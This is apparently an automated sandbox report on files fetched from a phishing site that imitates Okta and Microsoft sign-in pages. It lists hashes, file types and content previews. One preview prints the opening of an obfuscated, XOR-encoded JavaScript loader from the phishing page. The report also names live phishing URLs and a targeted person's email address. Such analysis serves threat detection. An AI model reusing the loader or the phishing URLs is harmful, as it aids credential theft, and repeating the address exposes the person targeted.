                                                                        Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):93276
                                                                        Entropy (8bit):7.997636438159837
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                        SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                        SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                        SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-vf2.woff2
                                                                        Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:downloaded
                                                                        Size (bytes):892
                                                                        Entropy (8bit):5.863167355052868
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:41D62CA205D54A78E4298367482B4E2B
                                                                        SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                        SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                        SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP45140
                                                                        Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (15937), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):20964
                                                                        Entropy (8bit):5.975671680823454
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C9281BE7F4BD999DFFE628148C6F5BB9
                                                                        SHA1:1937BD8B21258C49EB84DF336C479C1CA8805880
                                                                        SHA-256:DDADF4B9DC5935A39278DB3FE44818802D02D22F7BE3D86BFF856F11633E1D27
                                                                        SHA-512:BEF22B328E8DD81D1BB44991D8CC9891ECBFEF9F9E832AE4DDD603FEA863E765A4D00D935BE4D6E18734A2FBCE47DC405F719D0BB730608A18534F1AB924A66F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/nTJ777/
                                                                        Preview:<script>..function iGQzzWhdGQ(PJGnKsChdo, LCQKueAUiY) {..let tRvBsJmzGt = '';..PJGnKsChdo = atob(PJGnKsChdo);..let LKpTVIrFPL = LCQKueAUiY.length;..for (let i = 0; i < PJGnKsChdo.length; i++) {.. tRvBsJmzGt += String.fromCharCode(PJGnKsChdo.charCodeAt(i) ^ LCQKueAUiY.charCodeAt(i % LKpTVIrFPL));..}..return tRvBsJmzGt;..}..var pGoVgDDknA = iGQzzWhdGQ(`WAM2RiUnOUlEQAdNd1w4Iz0aDR1LEzpQKXknGEJXFgl7VyM6YgNGRwECLBl/eXtHBxwJGTsaJiRvVwsdFxMnXTwjc2Q9DhcTJ108I20aRVFZUj1AOCc+UxgdBxQ7Xj95LgVYRwAWOVU+MmMKWF9LET9VNHghAFVBSxMnTTwjIkRdQUtEewViZmIKRUsUBDoZJiRjBF5cShomFnJrYhpUQA0AIQpBXUBjC0EHAjxEOGlAY1lXE1ATQSI0OQBYXEwRIVsuf2oIYGsDOxIBJDMgBVlrPCIjVyVifjNgeA8TOFh+DRUgUFQsBzJQfjs4M3ALVzw4eiQ1ChFmUyM2IFALbjkgf0pcOR1QPDUgO0FWHUUzVws/JQtZYBISBnZ0MQ4rQms8KiVufhF9CwR7ERQNeiA0Ji9ZaDNFZXghOzgwBUpVKhJiNhwOI3RWPDoifSU8PSB/QSozPHUrHg4oUHsnMTJQfjs4M3ALVzw4TDoOfy8HUzNJIH0IZyogWnQNEmZifBggI0RrM0UnfSYkAypZAiozOGY6Dn4/Q2gzRWV4IREmM3JkVioCAXwDCgVNViMmIG4UHiIgWkYIFQJmOjN/XV5+JzI4UBtiJw1wXhISPHUjDRUzW1AKISV9BCQDKl5zAzkW
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10450)
                                                                        Category:downloaded
                                                                        Size (bytes):10498
                                                                        Entropy (8bit):5.327380141461276
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E0D37A504604EF874BAD26435D62011F
                                                                        SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                        SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                        SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                        Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):270
                                                                        Entropy (8bit):4.840496990713235
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):36696
                                                                        Entropy (8bit):7.988666025644622
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                        SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                        SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                        SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff
                                                                        Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):2905
                                                                        Entropy (8bit):3.962263100945339
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FE87496CC7A44412F7893A72099C120A
                                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/wxw1sZOySil8NEjvIYFtxD8u66tYQYXgQQAmnPjgqr0tgkbNH5Tke3Rab171
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):77073
                                                                        Entropy (8bit):7.876056172134186
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6849F4C7A7F7E7E7055A24911CE306F7
                                                                        SHA1:7E6710350C78318C0894894E1DA6CDDFE2B824C6
                                                                        SHA-256:256A71B904F26C4CA4736E35C853D96C42395D8DC801D68CDB5C3DC316290876
                                                                        SHA-512:E9ED211BE7E8CEB0ED9CB3D24EF67357FFFACE43A9EC98390340CFB0682472080C55403A1197CE839E785C6D68AEB93B4D0B4A57772E842B478A8DE66965FFB2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241
                                                                        Preview:.PNG........IHDR.......8.....g.V.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....-[....V#.F.....#dZ.*..y.Fe..Q...0.....@".r)+]v..U..t..6n..6R.1EB....j..!.j.....{.>.VV%..9Q.|w...Xk...].gp.....bE.~.uW~.............(........C>..o}................7o.bBXt..,h\../..../g4....W.^.sH.4...B..o...g......T.t&...Y..@_4.!..h.....@.....A @c.o:&.v......#.d..?.S.....1.r.......)#.....Y.f...:.._.!@.{M....V.BGG....iLy...f .@......J.s..?A(Jz...Y.\.f).......h.&........G...4.....h.B.4.\N..Q"...:(...h....C.. .....pp.#.zd.,h\y...f .@......N(...jF_.{.x..\.....Y:s..-....1..`bh...:,zd.,h\gx...f .@.z..S...\^A..AI...yB.\.f...7SB.. ....5.K..... ......@74.!...+...x@....t...#.Yz.....1..`bh...8.G........:...)......\T.?....g..1...dA..C.......4...L....+Y...=2@.4.....@k4.!...5........4h....Z.'t..,h...}3..h..)..Z3.W..c.G....C(&......hP..r.p"*.k...B.....5.of...A4..Ck..F.... ...5x..h.f .@.z......ry.W3..N....\.....Yz../o.u....A4..Ck.wM.B.@.......x..h.f .@......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):43596
                                                                        Entropy (8bit):7.9952701440723475
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                        SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                        SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                        SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-vf.woff2
                                                                        Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):25216
                                                                        Entropy (8bit):7.947339442168474
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F9A795E2270664A7A169C73B6D84A575
                                                                        SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                        SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                        SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):26765
                                                                        Entropy (8bit):5.114987586674101
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1A862A89D5633FAC83D763886726740D
                                                                        SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                        SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                        SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/56ybfCjabGpJyUZ8916
                                                                        Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):35970
                                                                        Entropy (8bit):7.989503040923577
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                        SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                        SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                        SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff
                                                                        Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):150230
                                                                        Entropy (8bit):5.8345144657424175
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F551056D88DBA8D899153B878C953551
                                                                        SHA1:2C313208E6A1B3367E93724214176D9123A8D1D2
                                                                        SHA-256:E88C99B62B9ADEE0A7EAA0C2A2E4A6303B644B5E27398FDF99ED69D79593B679
                                                                        SHA-512:77C5991415D9C655C7CF8CBF93CB897A4E786C91CDAE7E7CA84B4A737AA66FB19A02E70F5A86890999BD3995ECD7C55CC82C7C107E48FB1E439A754895156598
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW
                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):2061
                                                                        Entropy (8bit):4.68013947979367
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2C77B57688ED3408E3C8FE1F2BA204B7
                                                                        SHA1:D95EB88E5DAB3B3F55B3096E0FFDF415F9CBF108
                                                                        SHA-256:2E9529DFF72CA848F13B842FCFAEC9388BA170C9C3EC14A1CDF2F01CF55F3942
                                                                        SHA-512:FF6A1B622FE717DC87676E0173BA9D799A87A6CC5922AEDCD8E64C2D007972F02A909377B960B1E160B032BD30A7FAED215784795BA56521281E607224598447
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://y13tzxbjz1.moydow.de/DzC0pn01Csl0xBhEB8ZuBtzVkjUWPyAfYsoLARTnALcLCFnUCNW3DjobhQoJgtJFVwG9u3yxgKVJMxgGbRx2il5WBIbQaIcwT3MQa1jsOGLaAtedE1h9IThKR1LyVBhvwGIHHPsd60cpE2A5rtuhv6I2WjwtnliaqoT9XvtUNVLGJLs5tZQLcBfyptubL9vuVj1dixwg/dOGmOwe0jJcVHNyok9MfrN8x9KudV9hVKZoxRp1y2BOwFcLtHoWhYg7sREANrsfv3A5AfpiuKKaytzguSjLIsQ5RSezJDRkc6zjndnbLTWsxuI8keuUDUfnjzGiSaqgraw5zZ8KKB2TN4ykt2uTP8cCO2lsCahG3cVrtiyW29K12PSaLO0lWjUIFTWblxnTfKoo78ZNc/richard.thorn@quiltercheviot.com
